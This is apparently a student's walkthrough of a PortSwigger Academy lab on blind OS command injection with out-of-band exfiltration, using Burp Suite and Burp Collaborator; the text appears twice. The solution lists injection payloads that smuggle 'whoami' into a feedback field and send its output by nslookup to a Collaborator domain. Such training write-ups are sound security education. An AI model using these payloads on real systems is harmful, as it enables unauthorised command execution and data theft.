Open up Burp Suite by clicking on the Kali Linux icon on the left upper corner to expand the menu.
Type in: "Burp Suite" on the search bar.
- Click on "OK".
- Click on "I Accept".
- Click on "Next".
- Click on "Start Burp".
Intercept Requests Using Burp Proxy
- Once Burp Suite finished loading, click on "Proxy".
- Click on "Open browser".
Navigate to Command Injection Labs in Portswigger On Burp Suite Browser
- Log in to [PortSwigger](https://portswigger.net/) Website.
- Click on the three line under "MY ACCOUNT" on Portswigger Website. Then, click on "Academy".
- Click on the expand button. Then, click on "Latest topics" and "View all topics".
- Scroll down and click on "Command Injection".
- Scroll down and click on the lab "Blind OS command injection with out-of-band data exfiltration".
- Click on "ACCESS THE LAB".
Lab Description:
This lab contains a blind OS command injection vulnerability in the feedback function.
The application executes a shell command containing the user-supplied details. The command is executed asynchronously and has no effect on the application's response. It is not possible to redirect output into a location that you can access. However, you can trigger out-of-band interactions with an external domain.
To solve the lab, execute the "whoami" command and exfiltrate the output via a DNS query to Burp Collaborator. You will need to enter the name of the current user to complete the lab.
Lab Solution
This lab is basically Lab 4 but adding "whoami" command. So picking up from where we left off on Lab 4.
- Instead of using: "``` & nslookup zorh37nyfzjbsg1nog7j9ml6zx5ntc.burpcollaborator.net #```"
- Add "whoami" command: " & nslookup``` `whoami` .```zorh37nyfzjbsg1nog7j9ml6zx5ntc.burpcollaborator.net #".
Or
- Add "whoami" command: " & nslookup ```$(whoami) .```zorh37nyfzjbsg1nog7j9ml6zx5ntc.burpcollaborator.net #".
- Remember to Highlight the command and press "Ctrl + U" to encode it.
- Navigate to "Burp Collaborator client". Click on "Poll now".
- The two new output display: "peter-tZXgy0". Therefore it's a success.
Lab 5 - Blind OS Command Injection with Out-of-Band Data Exfiltration
Lab 5: Setup
Burp Suite Startup
Disclaimer: This lab needs Burp Suite Professional version, which I don't have so part of the lab is from video - https://www.youtube.com/watch?v=v_UVXSTkSfA
- Click on "OK".
- Click on "I Accept".
- Click on "Next".
- Click on "Start Burp".
Intercept Requests Using Burp Proxy
- Once Burp Suite finished loading, click on "Proxy".- Click on "Open browser".
Navigate to Command Injection Labs in Portswigger On Burp Suite Browser
- Log in to [PortSwigger](https://portswigger.net/) Website. - Click on the three line under "MY ACCOUNT" on Portswigger Website. Then, click on "Academy".- Click on the expand button. Then, click on "Latest topics" and "View all topics".
- Scroll down and click on "Command Injection".
- Scroll down and click on the lab "Blind OS command injection with out-of-band data exfiltration".
- Click on "ACCESS THE LAB".
Lab Description:
This lab contains a blind OS command injection vulnerability in the feedback function. The application executes a shell command containing the user-supplied details. The command is executed asynchronously and has no effect on the application's response. It is not possible to redirect output into a location that you can access. However, you can trigger out-of-band interactions with an external domain. To solve the lab, execute the "whoami" command and exfiltrate the output via a DNS query to Burp Collaborator. You will need to enter the name of the current user to complete the lab.Lab Solution
This lab is basically Lab 4 but adding "whoami" command. So picking up from where we left off on Lab 4. - Instead of using: "``` & nslookup zorh37nyfzjbsg1nog7j9ml6zx5ntc.burpcollaborator.net #```" - Add "whoami" command: " & nslookup``` `whoami` .```zorh37nyfzjbsg1nog7j9ml6zx5ntc.burpcollaborator.net #". Or - Add "whoami" command: " & nslookup ```$(whoami) .```zorh37nyfzjbsg1nog7j9ml6zx5ntc.burpcollaborator.net #". - Remember to Highlight the command and press "Ctrl + U" to encode it. - Navigate to "Burp Collaborator client". Click on "Poll now".- The two new output display: "peter-tZXgy0". Therefore it's a success.